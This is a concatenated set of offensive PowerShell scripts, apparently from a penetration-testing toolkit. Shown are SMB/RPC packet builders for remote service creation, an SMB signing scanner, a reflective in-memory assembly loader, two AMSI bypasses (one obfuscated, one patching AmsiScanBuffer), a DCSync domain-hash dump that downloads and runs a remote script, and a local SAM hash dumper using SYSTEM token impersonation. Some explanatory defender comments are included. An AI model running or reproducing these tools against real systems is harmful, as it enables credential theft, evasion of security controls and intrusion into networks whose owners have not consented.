$packet_RPCRequest.Add("RPCRequest_VersionMinor",[Byte[]](0x00)) 623 | $packet_RPCRequest.Add("RPCRequest_PacketType",[Byte[]](0x00)) 624 | $packet_RPCRequest.Add("RPCRequest_PacketFlags",$packet_flags) 625 | $packet_RPCRequest.Add("RPCRequest_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) 626 | $packet_RPCRequest.Add("RPCRequest_FragLength",$packet_frag_length) 627 | $packet_RPCRequest.Add("RPCRequest_AuthLength",$packet_auth_length) 628 | $packet_RPCRequest.Add("RPCRequest_CallID",$packet_call_ID) 629 | $packet_RPCRequest.Add("RPCRequest_AllocHint",$packet_alloc_hint) 630 | $packet_RPCRequest.Add("RPCRequest_ContextID",$packet_context_ID) 631 | $packet_RPCRequest.Add("RPCRequest_Opnum",$packet_opnum) 632 | 633 | if($packet_data.Length) 634 | { 635 | $packet_RPCRequest.Add("RPCRequest_Data",$packet_data) 636 | } 637 | 638 | return $packet_RPCRequest 639 | } 640 | 641 | #SCM 642 | 643 | function Get-PacketSCMOpenSCManagerW() 644 | { 645 | param ([Byte[]]$packet_service,[Byte[]]$packet_service_length) 646 | 647 | [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92) 648 | [Byte[]]$packet_frag_length = $packet_write_length[0,1] 649 | [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68) 650 | $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 651 | $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 652 | $packet_referent_ID1 += 0x00,0x00 653 | $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 654 | $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 655 | $packet_referent_ID2 += 0x00,0x00 656 | 657 | $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary 658 | 
$packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID",$packet_referent_ID1) 659 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount",$packet_service_length) 660 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) 661 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount",$packet_service_length) 662 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName",$packet_service) 663 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID",$packet_referent_ID2) 664 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00)) 665 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00)) 666 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00)) 667 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00)) 668 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown",[Byte[]](0xbf,0xbf)) 669 | $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask",[Byte[]](0x3f,0x00,0x00,0x00)) 670 | 671 | return $packet_SCMOpenSCManagerW 672 | } 673 | 674 | function Get-PacketSCMCreateServiceW() 675 | { 676 | param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length, 677 | [Byte[]]$packet_command,[Byte[]]$packet_command_length) 678 | 679 | $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 680 | $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 681 | $packet_referent_ID += 0x00,0x00 682 | 683 | $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary 684 | 
$packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle",$packet_context_handle) 685 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount",$packet_service_length) 686 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) 687 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount",$packet_service_length) 688 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName",$packet_service) 689 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID",$packet_referent_ID) 690 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount",$packet_service_length) 691 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) 692 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount",$packet_service_length) 693 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName",$packet_service) 694 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask",[Byte[]](0xff,0x01,0x0f,0x00)) 695 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType",[Byte[]](0x10,0x00,0x00,0x00)) 696 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00)) 697 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00)) 698 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount",$packet_command_length) 699 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) 700 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount",$packet_command_length) 701 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName",$packet_command) 702 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer",[Byte[]](0x00,0x00,0x00,0x00)) 703 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID",[Byte[]](0x00,0x00,0x00,0x00)) 704 | 
$packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00)) 705 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize",[Byte[]](0x00,0x00,0x00,0x00)) 706 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00)) 707 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00)) 708 | $packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize",[Byte[]](0x00,0x00,0x00,0x00)) 709 | 710 | return $packet_SCMCreateServiceW 711 | } 712 | 713 | function Get-PacketSCMStartServiceW() 714 | { 715 | param([Byte[]]$packet_context_handle) 716 | 717 | $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary 718 | $packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle",$packet_context_handle) 719 | $packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 720 | 721 | return $packet_SCMStartServiceW 722 | } 723 | 724 | function Get-PacketSCMDeleteServiceW() 725 | { 726 | param([Byte[]]$packet_context_handle) 727 | 728 | $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary 729 | $packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle",$packet_context_handle) 730 | 731 | return $packet_SCMDeleteServiceW 732 | } 733 | 734 | function Get-PacketSCMCloseServiceHandle() 735 | { 736 | param([Byte[]]$packet_context_handle) 737 | 738 | $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary 739 | $packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle",$packet_context_handle) 740 | 741 | return $packet_SCM_CloseServiceW 742 | } 743 | 744 | $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id 745 | $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) 746 | $process_ID = $process_ID -replace "-00-00","" 747 | [Byte[]]$process_ID_bytes = 
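$process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}

function Get-SMBSigningStatus
{
    <#
    .SYNOPSIS
    Sends one SMB Negotiate Protocol request over an already-connected TCP socket and reports
    whether the server's negotiate response says message signing is required.

    .PARAMETER SMB_relay_socket
    Connected System.Net.Sockets.TcpClient to the target's port 445. The socket is always closed
    before this function returns (the caller does not get it back).

    .PARAMETER HTTP_request_bytes
    Unused. Kept in second position so existing positional callers do not shift their arguments.

    .PARAMETER SMB_version
    "SMB1" to negotiate only the NT LM 0.12 dialect; any other value is handed unchanged to
    Get-PacketSMBNegotiateProtocolRequest (defined elsewhere in this file).

    .OUTPUTS
    [bool] $true when the response's SecurityMode field indicates signing is required
    (SMB1: byte 39 equals 0x0f; SMB2: byte 70 equals 0x03, i.e. SIGNING_ENABLED|SIGNING_REQUIRED),
    $false otherwise - including when the socket is not connected or the response is too short
    to contain the field.

    .NOTES
    The original implementation ran a one-state "switch" loop that always exited after the first
    pass; it is written here as straight-line code with the same send/receive sequence.
    #>
    param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version)

    $SMBSigningStatus = $false
    $SMB_client_receive = New-Object System.Byte[] 1024

    try
    {
        # A missing or unconnected socket used to surface as a NullReference on the stream;
        # report "not required" instead of throwing.
        if(-not $SMB_relay_socket -or -not $SMB_relay_socket.Connected)
        {
            return $SMBSigningStatus
        }

        $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()

        $packet_SMB_header = Get-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00
        $packet_SMB_data = Get-PacketSMBNegotiateProtocolRequest $SMB_version
        $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
        $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
        $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
        $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service

        $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
        $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
        $SMB_relay_challenge_stream.Flush()

        # Read() may return fewer bytes than the buffer holds; the count bounds the offset checks
        # below so a short or empty response (e.g. ReceiveTimeout hit) cannot index stale buffer bytes.
        $bytes_read = $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)

        # "\xffSMB" at offset 4 means the server answered with an SMB1 negotiate response.
        if($bytes_read -ge 8 -and [System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq "ff-53-4d-42")
        {
            $SMB_version = "SMB1"
        }

        if($SMB_version -eq "SMB1")
        {
            # SMB1 Negotiate response: SecurityMode byte at offset 39 of the NetBIOS-framed message.
            $SMBSigningStatus = ($bytes_read -gt 39 -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq "0f")
        }
        else
        {
            # SMB2 Negotiate response: SecurityMode at offset 70 (4 NetBIOS + 64 SMB2 header + 2 StructureSize).
            $SMBSigningStatus = ($bytes_read -gt 70 -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq "03")
        }
    }
    finally
    {
        # Same contract as before: this function owns the socket's lifetime and closes it on every path.
        if($SMB_relay_socket)
        {
            $SMB_relay_socket.Close()
        }
        $SMB_client_receive = $null
    }

    return $SMBSigningStatus
}

if($Target) {
    $Targets += $Target
}
foreach ($Target in $Targets) {
    $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
    # Only the receive side is bounded by $Timeout (presumably a parameter of the enclosing function);
    # Connect() itself blocks for the OS default.
    $SMB_relay_socket.Client.ReceiveTimeout = $Timeout
    $HTTP_client_close = $false

    # Connect() throws on refused/unreachable hosts instead of leaving .Connected false, so without
    # this catch a single dead host aborted the whole loop before "is not responding" was ever printed.
    try {
        $SMB_relay_socket.Connect($Target,"445")
    } catch {
        "$Target is not responding"
        $SMB_relay_socket.Close()
        continue
    }

    if(!$SMB_relay_socket.Connected)
    {
        "$Target is not responding"
        $SMB_relay_socket.Close()
        continue
    }

    # Bind by name: the positional call put "smb2" into $HTTP_request_bytes and left $SMB_version empty.
    $SigningStatus = Get-SMBSigningStatus -SMB_relay_socket $SMB_relay_socket -SMB_version "smb2"
    # $true means the server reported signing as *required*; "enabled but optional" reports as not required.
    if ($SigningStatus){
        "Signing Enabled"
    } else {
        "Signing Not Required"
    }
    if ($Delay) {
        # Get-Random rejects Maximum 0, which an unset $DelayJitter would produce.
        if ($DelayJitter) {
            $Jitter = get-random -Minimum 0 -Maximum $DelayJitter
        } else {
            $Jitter = 0
        }
        sleep ($Delay+$Jitter)
    }
}

}
--------------------------------------------------------------------------------
/Invoke-MSSQLup.ps1:
--------------------------------------------------------------------------------
#IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1")
Function Invoke-MSSQLup {
param ($Command)
$b64Str = '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'
$b64Str = $b64Str -replace '\s','' # Remove whitespace

if (![string]::IsNullOrWhiteSpace($b64Str)) {
try {
$compBytes = [Convert]::FromBase64String($b64Str)

if ($compBytes -and $compBytes.Count -gt 0) {
$compStream = New-Object System.IO.MemoryStream($compBytes, 0, $compBytes.Length)
$gzipStream = New-Object System.IO.Compression.GzipStream($compStream, [System.IO.Compression.CompressionMode]::Decompress)
$decompStream = New-Object System.IO.MemoryStream
$buf = New-Object byte[](4096)

do {
$read = $gzipStream.Read($buf, 0, $buf.Length)
if ($read -gt 0) { $decompStream.Write($buf, 0, 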
$read) } 20 | } while ($read -gt 0) 21 | 22 | $gzipStream.Close() 23 | $compStream.Close() 24 | 25 | $decompStream.Position = 0 26 | $decompBytes = $decompStream.ToArray() 27 | $decompStream.Close() 28 | 29 | $asm = [System.Reflection.Assembly]::Load($decompBytes) 30 | $entry = $asm.EntryPoint 31 | $Output = $entry.Invoke($null, @((,($Command -split ' ')))) 32 | $Output = $Output.Trim() 33 | $Output | FT 34 | } else {}} catch {}} else {} 35 | } 36 | -------------------------------------------------------------------------------- /Invoke-Mongoose.ps1: -------------------------------------------------------------------------------- 1 | S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 2 | -------------------------------------------------------------------------------- /Invoke-NETMongoose.ps1: -------------------------------------------------------------------------------- 1 | Function Invoke-NETMongoose{ 2 | # Based on the original code by Gustav Shen 3 | function lf{param($m,$f)$a=[AppDomain]::CurrentDomain.GetAssemblies()|?{$_.GlobalAssemblyCache-and$_.Location.Split('\')[-1]-eq'System.dll'}|%{$_.'GetType'('Microsoft.Win32.UnsafeNativeMethods')} 4 | $t=$a.'GetMethods'()|?{$_.Name-like'Ge*P*oc*ddress'} 5 | $t[0].'Invoke'($null,@(($a.'GetMethod'('GetModuleHandle')).'Invoke'($null,@($m)),$f))} 6 | function 
g{Param($f,$d=[Void])$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]'R',[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I',$false).DefineType('M','Class,Public,Sealed,AnsiClass,AutoClass',[System.MulticastDelegate]) 7 | $t.DefineConstructor('RTSpecialName,HideBySig,Public',[System.Reflection.CallingConventions]::Standard,$f).SetImplementationFlags('Runtime,Managed') 8 | $t.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$d,$f).SetImplementationFlags('Runtime,Managed') 9 | return $t.CreateType()} 10 | $a="A";$b="msiS";$c="canB";$d="uffer" 11 | [IntPtr]$f=lf amsi.dll ($a+$b+$c+$d);$o=0 12 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((lf kernel32.dll VirtualProtect),(g @([IntPtr],[UInt32],[UInt32],[UInt32].MakeByRefType())([Bool]))) 13 | $vp.Invoke($f,3,0x40,[ref]$o)>$null 14 | $b=[Byte[]](0xb8,0x34,0x12,0x07,0x80,0x66,0xb8,0x32,0x00,0xb0,0x57,0xc3) 15 | [System.Runtime.InteropServices.Marshal]::Copy($b,0,$f,12)} 16 | Invoke-NETMongoose 17 | -------------------------------------------------------------------------------- /Invoke-NTDS.ps1: -------------------------------------------------------------------------------- 1 | Function Invoke-NTDS { 2 | param ( 3 | [string]$Domain = $env:USERDNSDOMAIN, 4 | [switch]$NoComputerHashes 5 | ) 6 | 7 | $DomainControllerCheck = Get-WmiObject "Win32_ComputerSystem" | Select-Object -Expand "DomainRole" 8 | if ($DomainControllerCheck -ne "5"){return "NotDomainController"} 9 | 10 | IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-Pandemonium.ps1') 11 | 12 | $Command = '"lsaDUMp::dCsyNc /DOmaIN:' + $Domain + ' /alL /cSv"' 13 | $output = Invoke-Pandemonium -Command $Command 14 | 15 | $lines = $output -split '\r?\n' 16 | 17 | $Data = $lines | ForEach-Object { 18 | $columns = $_ -split "`t" 19 | $user = $columns[1] 20 | $hash = $columns[2] 21 | if ($user -and $hash) 
# Tail of a definition that starts before this excerpt (DumpSAM.ps1 lines 21-24); it only formats a
# "user::LM:NT:::" hash line and is left as found.
{
22 | "$user::aad3b435b51404eeaad3b435b51404ee:$hash:::"
23 | }
24 | }
25 | 
# --- DumpSAM.ps1 ---
# DumpSAM: local SAM credential dumper. It impersonates the winlogon (SYSTEM) token (IAS), reads the
# SAM hive and the LSA boot-key material directly from the registry (GNLPH), decrypts each account's NT
# hash and prints "<user>:<RID>:<empty LM>:<NT>:::" lines. All errors are suppressed
# ($ErrorActionPreference = "SilentlyContinue") and the Win32 error codes collected in $c are never
# reported, so any partial failure is silent. Presumably needs an elevated administrator context to
# open winlogon at all.
# Defender notes, all taken from the code itself: an Add-Type compile of ad-hoc P/Invoke stubs from a
# script host; OpenProcess on winlogon.exe with access 0x400 followed by OpenProcessToken /
# DuplicateTokenEx / ImpersonateLoggedOnUser; registry reads of HKLM\SAM\SAM\Domains\Account\Users and
# of the class strings of SYSTEM\CurrentControlSet\Control\Lsa\{JD,Skew1,GBG,Data} by a process other
# than lsass. The P/Invoke type names impsys.win32 and ntlmx.win32 recur across this author's scripts
# (Kirby.ps1 below compiles the same impsys.win32 when it is not already loaded), so they are stable
# hunting strings; script block logging captures the whole function body.
26 | function DumpSAM{$ErrorActionPreference = "SilentlyContinue"
# Compiles the impsys.win32 process/token stubs on first use (the try/catch is a "type already loaded?" probe).
27 | try{&{[void][impsys.win32]}}catch{Add-Type -TypeDefinition "using System;using System.Runtime.InteropServices;namespace impsys{public class win32{[DllImport(`"kernel32.dll`",SetLastError=true)]public static extern bool CloseHandle(IntPtr hHandle);[DllImport(`"kernel32.dll`",SetLastError=true)]public static extern IntPtr OpenProcess(uint processAccess,bool bInheritHandle,int processId);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool OpenProcessToken(IntPtr ProcessHandle,uint DesiredAccess,out IntPtr TokenHandle);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool DuplicateTokenEx(IntPtr hExistingToken,uint dwDesiredAccess,IntPtr lpTokenAttributes,uint ImpersonationLevel,uint TokenType,out IntPtr phNewToken);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool RevertToSelf();}}"}
# IAS: runs $Process while impersonating winlogon's token: OpenProcess(0x400), OpenProcessToken(0x0E),
# DuplicateTokenEx(0x02000000 = MAXIMUM_ALLOWED, impersonation level 2, token type 1 = primary),
# ImpersonateLoggedOnUser, then RevertToSelf in finally. Each failure only records GetLastWin32Error in $c
# and falls through, so $Process still runs, possibly unimpersonated. None of $b, $d, $f is ever closed;
# CloseHandle is declared in impsys.win32 but never called.
28 | function IAS{[CmdletBinding()]param([Parameter(Mandatory=$true,Position=0)][scriptblock]$Process,[Parameter(Position=1)][object[]]$ArgumentList);$a=GPS -Name "winlogon"|Select -First 1 -ExpandProperty Id;if(($b=[impsys.win32]::OpenProcess(0x400,$true,[Int32]$a)) -eq [IntPtr]::Zero){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$d=[IntPtr]::Zero;if(-not [impsys.win32]::OpenProcessToken($b,0x0E,[ref]$d)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$f=[IntPtr]::Zero;if(-not [impsys.win32]::DuplicateTokenEx($d,0x02000000,[IntPtr]::Zero,0x02,0x01,[ref]$f)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}try{if(-not [impsys.win32]::ImpersonateLoggedOnUser($f)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}& $Process @ArgumentList}finally{if(-not [impsys.win32]::RevertToSelf()){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}}}
# ntlmx.win32: raw advapi32 registry stubs. RegQueryInfoKey is used below only for its lpClass output
# (a key's class string) — presumably the reason the raw API is used instead of the registry provider.
29 | try{&{[void][ntlmx.win32]}}catch{Add-Type -TypeDefinition "using System;using System.Text;using System.Runtime.InteropServices;namespace ntlmx{public class win32{[DllImport(`"advapi32.dll`",SetLastError=true,CharSet=CharSet.Auto)]public static extern int RegOpenKeyEx(IntPtr hKey,string subKey,int ulOptions,int samDesired,out IntPtr hkResult);[DllImport(`"advapi32.dll`",SetLastError=true,CharSet=CharSet.Auto)]public static extern int RegQueryInfoKey(IntPtr hkey,StringBuilder lpClass,ref int lpcbClass,int lpReserved,out int lpcSubKeys,out int lpcbMaxSubKeyLen,out int lpcbMaxClassLen,out int lpcValues,out int lpcbMaxValueNameLen,out int lpcbMaxValueLen,out int lpcbSecurityDescriptor,IntPtr lpftLastWriteTime);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern int RegCloseKey(IntPtr hKey);}}"}
# GNLPH: for every user key under HKLM:SAM\SAM\Domains\Account\Users (8-hex-digit RID names) reads the V
# and F blobs, assembles boot-key material from the four Lsa subkey class strings, and decrypts the
# stored NT hash: the AES-CBC path when $v[0xAC] is 0x38, the MD5/RC4 path when it is 0x14, and a final
# DES step keyed from the RID in both cases. Any other revision byte emits the fixed constant
# 31D6CFE0D16AE931B73C59D7E0C089C0 (the empty-password NT hash), so such rows mean "unrecognised
# format", not "blank password" — and execution then continues into the DES step with $enc_ntlm unset
# (errors suppressed). Emits one PSObject {Username, RID, NTLM} per account. Works only because it runs
# under IAS's SYSTEM impersonation; by default the SAM hive is not readable by administrators.
30 | function GNLPH{GCI "HKLM:SAM\SAM\Domains\Account\Users"|?{$_.PSChildName -match "^[0-9A-F]{8}$"}|%{$ae=$_.PSChildName;$v=(Get-ItemProperty "HKLM:SAM\SAM\Domains\Account\Users\$ae" -Name V).V;$f=(Get-ItemProperty "HKLM:SAM\SAM\Domains\Account" -Name F).F;$xc=-join(&{"JD","Skew1","GBG","Data"|%{$ou=[IntPtr]::Zero;if([ntlmx.win32]::RegOpenKeyEx(0x80000002,"SYSTEM\CurrentControlSet\Control\Lsa\$_",0x0,0x19,[ref]$ou)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error();throw [ComponentModel.Win32Exception]$e}$lp=New-Object Text.StringBuilder 1024;[int]$oz=1024;if([ntlmx.win32]::RegQueryInfoKey($ou,$lp,[ref]$oz,0x0,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[IntPtr]::Zero)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error();throw [ComponentModel.Win32Exception]$e}[void][ntlmx.win32]::RegCloseKey($ou);$lp.ToString()}});$md5=[Security.Cryptography.MD5]::Create();$q=[Security.Cryptography.Aes]::Create();$q.Mode=[Security.Cryptography.CipherMode]::CBC;$q.Padding=[Security.Cryptography.PaddingMode]::None;$q.KeySize=128;$k=[Security.Cryptography.DES]::Create();$k.Mode=[Security.Cryptography.CipherMode]::ECB;$k.Padding=[Security.Cryptography.PaddingMode]::None;$uu=[BitConverter]::ToInt32($v,0x0C)+0xCC;$len=[BitConverter]::ToInt32($v,0x10);$username=[Text.Encoding]::Unicode.GetString($v,$uu,$len);$uu=[Bitconverter]::ToInt32($v,0xA8)+0xCC;$bk=8,5,4,2,11,9,13,3,0,6,1,12,14,10,15,7|%{[Convert]::ToByte("$($xc[$_*2])$($xc[$_*2+1])",16)};switch($v[0xAC]){0x38{$enc_syskey=$f[0x88..0x97];$enc_syskey_iv=$f[0x78..0x87];$enc_syskey_key=$bk;$syskey=$q.CreateDecryptor($enc_syskey_key,$enc_syskey_iv).TransformFinalBlock($enc_syskey,0,16);$enc_ntlm=$v[($uu+24)..($uu+24+0x0F)];$enc_ntlm_iv=$v[($uu+8)..($uu+23)];$enc_ntlm_key=$syskey;$enc_ntlm=$q.CreateDecryptor($enc_ntlm_key,$enc_ntlm_iv).TransformFinalBlock($enc_ntlm,0,16)}0x14{$enc_syskey=$f[0x80..0x8f];$enc_syskey_key=$md5.ComputeHash($f[0x70..0x7f]+[Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0")+$bk+[Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"));$syskey=rc4 $enc_syskey $enc_syskey_key;$enc_ntlm=$v[($uu+4)..($uu+4+0x0F)];$enc_ntlm_key=$md5.ComputeHash($syskey+(3,2,1,0|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)})+[Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"));$enc_ntlm=rc4 $enc_ntlm $enc_ntlm_key}default{New-Object PSObject -Property @{Username=$username;RID=[int]"0x$ae";NTLM="31D6CFE0D16AE931B73C59D7E0C089C0"}}}$k_str_1=3,2,1,0,3,2,1|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)};$k_str_2=0,3,2,1,0,3,2|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)};$k_key_1=str_to_key $k_str_1;$k_key_2=str_to_key $k_str_2;$ntlm_1=$k.CreateDecryptor($k_key_1,$k_key_1).TransformFinalBlock($enc_ntlm,0,8);$ntlm_2=$k.CreateDecryptor($k_key_2,$k_key_2).TransformFinalBlock($enc_ntlm,8,8);$ntlm=[BitConverter]::ToString($ntlm_1+$ntlm_2)-replace '-','';New-Object PSObject -Property @{Username=$username;RID=[int]"0x$ae";NTLM=$ntlm}}}
# rc4: textbook RC4 (key schedule on line 31, keystream XOR on line 32); the key array is tiled 256 times
# so $k[$_] wraps over the key length. Used only by the 0x14 branch of GNLPH.
31 | function rc4($d,$k){$r=$d;$s,$k=@(0..255),@($k*256);$j=0;0..255|%{$j=($j+$s[$_]+$k[$_])%256;$s[$_],$s[$j]=$s[$j],$s[$_]}
32 | $i=$j=0;0..($r.Length-1)|%{$i=($i+1)%256;$j=($j+$s[$i])%256;$s[$i],$s[$j]=$s[$j],$s[$i];$t=($s[$i]+$s[$j])%256;$r[$_]=$r[$_]-bxor$s[$t]};$r}
# str_to_key: spreads a 7-byte input into 8 bytes of 7 bits each, then maps every byte through the
# odd-parity table — the standard DES key expansion. Shifts go through bitshift, presumably to stay
# compatible with PowerShell versions that lack the -shl/-shr operators (added in 3.0).
33 | function str_to_key($s) {
